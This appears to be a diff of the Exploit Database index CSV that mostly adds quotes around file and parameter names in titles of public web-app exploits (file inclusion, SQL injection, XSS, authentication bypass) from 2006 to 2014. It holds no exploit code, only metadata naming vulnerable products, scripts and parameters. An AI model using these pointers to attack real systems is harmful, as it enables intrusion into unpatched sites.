-29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 +29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 @@ -31390,7 +31394,7 @@ id,file,description,date,author,platform,type,port 29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - 'engine/Ajax/editnews.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 -29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 +29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 @@ -31398,7 +31402,7 @@ id,file,description,date,author,platform,type,port 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 -29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 +29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 @@ -31417,7 +31421,7 @@ id,file,description,date,author,platform,type,port 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion",2007-03-26,Crackers_Child,php,webapps,0 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 -29782,platforms/php/webapps/29782.txt,"Satel Lite - Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 +29782,platforms/php/webapps/29782.txt,"Satel Lite - 'Satellite.php' Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 29786,platforms/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 30105,platforms/php/webapps/30105.txt,"WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 @@ -31484,10 +31488,10 @@ id,file,description,date,author,platform,type,port 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29825,platforms/php/webapps/29825.txt,"UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 -29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion",2007-04-09,Liz0ziM,php,webapps,0 +29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion",2007-04-09,Liz0ziM,php,webapps,0 29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 - 'login.php' HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz - 'index.php' Cross-Site Scripting",2007-04-10,hackberry,php,webapps,0 -29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 - Week_Events.php Remote File Inclusion",2007-04-10,hackberry,php,webapps,0 +29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion",2007-04-10,hackberry,php,webapps,0 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 @@ -31507,26 +31511,26 @@ id,file,description,date,author,platform,type,port 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - Img_Popup.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29855,platforms/php/webapps/29855.txt,"Flowers - Cas.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 -29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - footer.php Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 -29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 +29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 +29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 - Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections",2007-04-17,Aleksandar,php,webapps,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",php,webapps,0 -29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 +29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 -29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - Turbulence.php Remote File Inclusion",2007-04-20,Omni,php,webapps,0 +29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion",2007-04-20,Omni,php,webapps,0 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 - You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 -29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 -29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 +29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 +29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 -29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 +29883,platforms/php/webapps/29883.txt,"ACVSWS - 'Transport.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 -29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - RTMessageAdd.php Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 +29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - admin.php modsettings Module smiley_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 @@ -31537,20 +31541,20 @@ id,file,description,date,author,platform,type,port 29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29895,platforms/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - 'login.php3' Directory Traversal",2007-04-25,anonymous,php,webapps,0 -29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 - Include.php Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 -29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 - AddVIP.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 +29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29903,platforms/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusion",2007-04-25,CodeXpLoder'tq,php,webapps,0 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 -29907,platforms/php/webapps/29907.txt,"Comus 2.0 - Accept.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29907,platforms/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29908,platforms/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion",2007-04-25,s3rv3r_hack3r,php,webapps,0 29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - config.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - action.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 -29914,platforms/php/webapps/29914.txt,"Doruk100Net - Info.php Remote File Inclusion",2007-04-26,Ali7,php,webapps,0 +29914,platforms/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,php,webapps,0 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0 29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang Parameter) XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 @@ -31562,13 +31566,13 @@ id,file,description,date,author,platform,type,port 29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 29938,platforms/php/webapps/29938.txt,"E-Annu - home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0 29941,platforms/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0 -29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 +29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 29946,platforms/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.asp Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 -29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - MFA_Theme.php Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 +29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 @@ -31703,7 +31707,7 @@ id,file,description,date,author,platform,type,port 30388,platforms/php/webapps/30388.txt,"Vikingboard 0.1.2 - 'cp.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps,0 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 -30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0 +30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0 @@ -31723,7 +31727,7 @@ id,file,description,date,author,platform,type,port 30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti - index.asp Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps,0 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30332,platforms/asp/webapps/30332.txt,"Image Racer - searchresults.asp SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0 -30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - Function_List.php Local File Inclusion",2007-07-23,You_You,php,webapps,0 +30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - 'Function_List.php' Local File Inclusion",2007-07-23,You_You,php,webapps,0 30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 @@ -31785,11 +31789,11 @@ id,file,description,date,author,platform,type,port 30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections",2007-08-03,"Aria-Security Team",asp,webapps,0 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 -30456,platforms/php/webapps/30456.txt,"VietPHP - _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 -30457,platforms/php/webapps/30457.txt,"VietPHP - admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 +30456,platforms/php/webapps/30456.txt,"VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 +30457,platforms/php/webapps/30457.txt,"VietPHP - 'admin/index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' Parameter SQL Injection",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 -30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 +30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 @@ -31798,12 +31802,12 @@ id,file,description,date,author,platform,type,port 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 30478,platforms/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80 -30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30483,platforms/php/webapps/30483.txt,"Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 +30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 @@ -31811,8 +31815,8 @@ id,file,description,date,author,platform,type,port 30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion",2007-07-09,Crackers_Child,php,webapps,0 30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0 30505,platforms/asp/webapps/30505.txt,"Text File Search Classic - TextFileSearch.asp Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0 -30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 - forumreply.php Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 -30510,platforms/php/webapps/30510.txt,"Firesoft - Class_TPL.php Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 +30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 +30510,platforms/php/webapps/30510.txt,"Firesoft - 'Class_TPL.php' Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 - Uyeler2.php SQL Injection",2007-08-20,dumenci,php,webapps,0 30514,platforms/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,java,webapps,0 30515,platforms/php/webapps/30515.txt,"coWiki - 'index.php' Cross-Site Scripting",2007-08-21,MustLive,php,webapps,0 @@ -31843,7 +31847,7 @@ id,file,description,date,author,platform,type,port 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - users/register.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 -30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - autohtml.php Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 +30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0 30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,php,webapps,0 @@ -31916,7 +31920,7 @@ id,file,description,date,author,platform,type,port 30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - default.asp SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 -30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 +30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 @@ -31970,12 +31974,12 @@ id,file,description,date,author,platform,type,port 30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module - Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,php,webapps,0 